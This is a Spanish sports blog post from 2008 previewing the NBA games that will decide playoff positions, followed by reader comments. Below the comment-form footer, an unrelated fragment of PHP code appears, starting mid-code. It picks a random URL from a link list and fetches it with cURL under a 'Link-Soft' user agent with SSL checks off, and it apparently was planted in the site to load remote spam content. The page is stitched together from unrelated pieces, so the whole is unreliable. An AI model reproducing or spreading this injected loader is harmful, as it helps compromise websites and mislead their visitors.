Dónde y cuándo se decide la regular season

08 de April de 2008 por MagicJohnson32

bdavisenajeraQuedan 8 días para la conclusión de la fase regular y muchas cosas están todavía por decidir. En el Oeste casi cualquier cosa es posible y lo único que parece seguro es que los Jazz finalizarán líderes de la NorthWest y por tanto entrarán en Playoffs como cuartos. Hornets, Spurs y Lakers se disputan ser primeros de la conferencia, aunque tanto Rockets como Suns aún aspiran a colarse entre los de arriba y obtener el factor cancha en primera ronda. Los Mavs han tomado oxígeno con el regreso de Nowitzki y han dejado a Nuggets y Warriors luchando por la octava posición. En el Este, los Cavs se han complicado la vida y la cuarta posición, y los Wizards se han situado a sólo 2 partidos de arrebatársela. Pero si los de la capital no firman un buen tramo final podrían irse hasta la séptima posición ya que tienen a los Sixers a un partido y a los Raptors a dos. Los Hawks parecen haberse asegurado la octava plaza, aunque una buena racha de los Pacers les ha situado a tres partidos.

Hemos hecho una selección de los partidos que van a determinar la configuración de los Playoffs.

Éstos son los encuentros y las fechas que has de marcar en rojo, así como algunas de las claves que decidirán estos partidos:

Martes 8:

Atlanta @ Indiana – El último tren con destino a los Playoffs pasa para los Pacers. En realidad, nadie se cree que Indiana tenga posibilidades reales pero una victoria esta noche ante los Hawks reduciría la diferencia entre ambos equipos a dos partidos y generaría dudas en Atlanta. Lo cierto es que Mr. Stern debería plantearse por qué a estas alturas de la temporada los Pacers aún tienen opciones de meterse en Playoffs.

Utah @ New Orleans – Los Jazz, unos de los equipos que más bajan como visitantes, visitan una de las plazas más difíciles de la liga. Utah busca tener el factor cancha a favor en una primera ronda que le enfrentará muy posiblemente a Suns o Rockets. Los Hornets defienden su liderato de conferencia. El último duelo entre Deron y Paul se saldó con exhibición del de los Jazz. ¿Habrá venganza?

nashparkerMiércoles 9:

Phoenix @ San Antonio – Los Spurs estarán encantados de impedir la escalada de los Suns en este duelo que se ha convertido en un clásico desde que Horry enviase a Nash a la mesa de anotadores. Los de D’Antoni necesitan acabar la temporada en positivo para ganar confianza en sí mismos, especialmente después del hundimiento en el último cuarto contra los Mavs.

Jueves 10:

Denver @ Golden State – Los dos equipos que más puntos anotan y encajan son los dos equipos que se disputan la última plaza de Playoffs en el Oeste, salvo que Nowitzki vuelva a lesionarse. El Oracle Arena de Oackland será una olla a presión en un partido que promete mucho espectáculo y poca defensa. Sólo puede quedar uno.

Utah @ Dallas – El calendario de los Jazz es terrorífico y en esta ocasión les lleva a la cancha de los Mavs. Nowitzki amenaza con seguir haciendo estragos a lo Verbal Kint, con una cojera que esconde al Kayser Söze que lleva dentro.

Viernes 11:

Phoenix @ Houston – Vaya papelón el que espera a Luis Scola ante Amare. Difícil lo tendrán los Rockets para frenar el torrente ofensivo de los Suns, aunque si logran llevar el partido a su terreno tendrán bastante ganado. Nos encantará ver, una vez más, el duelo entre Mutombo y O’Neal. Los Rockets, quintos, aventajan en un partido a los Suns y el premio es evitar a Spurs, Lakers ocplakers Hornets en primera ronda y enfrentarse a los Jazz.

New Orleans @ L.A. Lakers – Atención a todo lo que puede decidirse en este partido: 1) el liderato de la Conferencia Oeste, ya que los Hornets están ahora mismo 1 1/2 partidos por delante de los Lakers; 2) las series entre ambos equipos esta temporada, que ahora son 2-1 favorables a los Hornets. De ganar los Lakers, la serie estaría empatada y en caso de igual balance, los angelinos pasarían a los de New Orleans por su mejor balance ante equipos de la misma conferencia. 3) el MVP de la temporada, ya que Chris Paul y Kobe Bryant aparecen como los favoritos en esta recta final y una exhibición por parte de uno u otro ayudaría a decantar muchos votos. ¿Se puede pedir más? Sí: que lo televise Cuatro en directo.

Sábado 12:

Philadelphia @ Washington – Llegados a este punto, no nos extrañaría que los equipos especulasen con el resultado para elegir su rival en primera ronda. Habrá quien prefiera enfrentarse a Orlando antes que a los Cavs, por lo que si los Wizards no se encuentran en disposición de luchar por la cuarta plaza, puede que no se esfuercen mucho por ganar e incluso opten por dar descanso a sus maltrechas estrellas.

Denver @ Utah – Difícil lo tendrán los Nuggets para sacar algo positivo de la pista más difícil de la liga. Los Jazz sólo han cedido cuatro partidos en el EnergySolutions y, con tanto en juego, no es probable que lo hagan ante el equipo más irregular que hayamos visto. Además, Sloan y Deron Williams exprimirán los enormes defectos defensivos de George Karl y los suyos, que sólo pueden esperar un partido descontrolado donde puedan brillar sus individualidades.

bowenkobeDomingo 13:

San Antonio @ L.A. Lakers – Hubo un tiempo en que Lakers y Spurs dirimían el título en las eliminatorias del Oeste. Puede que esos días estén de vuelta. Como aperitivo, los texanos visitan L.A. con la mirada de ambos equipos puesta en el liderato del Oeste. Horry será el único bienvenido por la afición del Staples. Por si necesitásemos más atractivos, cabe la posibilidad de que Andrew Bynum regrese para este partido.

Houston @ Denver – Otro difícil compromiso para los Nuggets, que en esta ocasión recibirán a los Rockets. Se enfrentarán dos estilos de juego radicalmente diferentes, con la solidez defensiva de los de Adelman tratando de contener la caótica improvisación de los de Colorado. El ritmo al que se juegue el partido resultará determinante.

Lunes 14:

Cleveland @ Philadelphia – Un posible enfrentamiento de primera ronda y de nuevo la posibilidad de especular. Los Cavs deberían dar descanso a la espalda de LeBron pero tal vez no puedan permitírselo. Pero los Sixers, una de las sorpresas más agradables de la segunda mitad de temporada, pueden llegar en situación de elegir rival, y no hace mucho que vencieron en Detroit.

Houston @ Utah – Llevan camino de volver a enfrentarse en primera ronda de los Playoffs, tal y como ya sucediese en la magnífica eliminatoria que ambos equipos protagonizaron el año pasado. En aquellabaronash ocasión, los Jazz superaron a los Rockets en el 7º partido. Esta vez, Houston no dispondrá de Yao. En principio, ventaja para Utah.

Golden State @ Phoenix – Garantía de partidos espectaculares, Warriors y Suns se jugarán mucho en un partido de altos vuelos. Baron contra Nash, Jackson contra Bell, Monta Ellis contra Barbosa, Shaq contra Biedrins y Amare contra… ¿quién?

Martes 15:

Orlando @ Atlanta – Si los Hawks no logran sellar antes su clasificación matemática para los Playoffs, aquí tendrán una nueva oportunidad ante un rival muy complicado pero que llegará con los deberes hechos y la mente puesta en la primera ronda. Si Al Horford consigue brillar ante Dwight, el RoY será suyo.

cp3jkiddMiércoles 16:

Utah @ San Antonio – Quién sabe qué habrá en juego para entonces, pero probablemente será mucho. El factor cancha, el liderato del Oeste, un rival más fácil en primera ronda… sea lo que sea, los Jazz han de rezar para llegar a este partido sin la necesidad de ganar.

New Orleans @ Dallas – En otro partido grande para la última noche de regular season, los Hornets visitarán Dallas. Chris Paul ya dio la bienvenida a Kidd con un auténtico baño en su debut con los Mavs, así que será una buena ocasión para que el gran Jason se reivindique.

Comenta

7 comentarios a esta entrada

  1. telekoman dice:
    #1

    Este artículo habrá que ir revisándolo día a día para ver los progresos y retrocesos de la gente. Está bien que todo esté por decidir. Le añade mucha emoción al tramo final.

      Citar

  2. TheDeerHunter dice:
    #2

    Vaya articulito te has currado… me quito el sombrero.
    Muy bueno lo de Dirk – Soze… aunque después de ver el batacazo a mí me cuesta creer que sea teatro. Los números dicen lo contrario.

    Algunos de estos partidos son algo más que el mero resultado. Son un aviso para playoffs y son parte de la batalla (psicológica) Por eso me cabreo tanto cuando veo relajación en alguno de ellos.

    PD: Cuatro sí da el NO@LA en directo. 😀

      Citar

  3. MagicJohnson32 dice:
    #3

    Gracias tío.

    Sí, Cuatro da el partido, por eso sigo, que si se podía pedir algo más, lo tenemos. Pedazo de partido el del viernes, qué ganas de que llegue. Pero antes hemos de ganar hoy en Portland, un sitio que se nos da fatal. Llevamos 5 derrotas seguidas allá y tienen jugadores que nos hacen mucho daño, especialmente Outlaw.

      Citar

  4. TheDeerHunter dice:
    #4

    Bueno, Portland también lleva una rachilla de 5 derrotas seguidas, aunque en el último volvió B. Roy (con 18ptos su anotación más baja de la temporada… asombroso)

    Con un equipo como LA es difícil predecirlo, pero en este momento la motivación es fundamental. No juega lo mismo un equipo que pelea por el título de división/conferencia que uno que no se juega nada y sólo piensa en que se acabe esta “puñetera” temporada para pillar vaciones.
    A riesgo de equivocarme (que me los conozco) soy optimista con el partido de esta noche.

    Si ya no ganamos hoy… apaga

      Citar

  5. Dantley dice:
    #5

    jo, jo, Verbal Nowitzki, que crack Magic.

    Menudo nivel de artículo. Para el año que viene te vamos a pedir uno a principios de temporada con los 1.230 partidos de la liga regular y una predicción de playoffs ¡¡¡

      Citar

  6. MagicJohnson32 dice:
    #6

    Deer, la anotación más baja de Roy no son esos 18. Habrás leído el mismo artículo que yo, en el L.A. Times me parece, donde decía que los 65 puntos que hicieron los Blazers contra los Spurs el otro día fueron la más baja del equipo este año, pero daba lugar a la confusión 😉

    Roy promedia 19 puntos, sería el Dios de la regularidad si su mínimo fuesen 18, jaja.

    Sobre la motivación, hombre, sí, deberíamos ganar. Pero no nos tienen mucho cariño por ahí y jugar contra Lakers siempre es una motivación, ya lo sabes, y más para un equipo joven con ganas de agradar y que quiere acabar la temporada con más del 50% de victorias. Veremos.

    Gracias Mr. Dantley. Ese artículo… Pues todo es cuestión de ponerse, y el verano es muuuy largo en la NBA.

      Citar

  7. TheDeerHunter dice:
    #7

    Soy el puñetero nostradamus (LAL103 POR 112)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>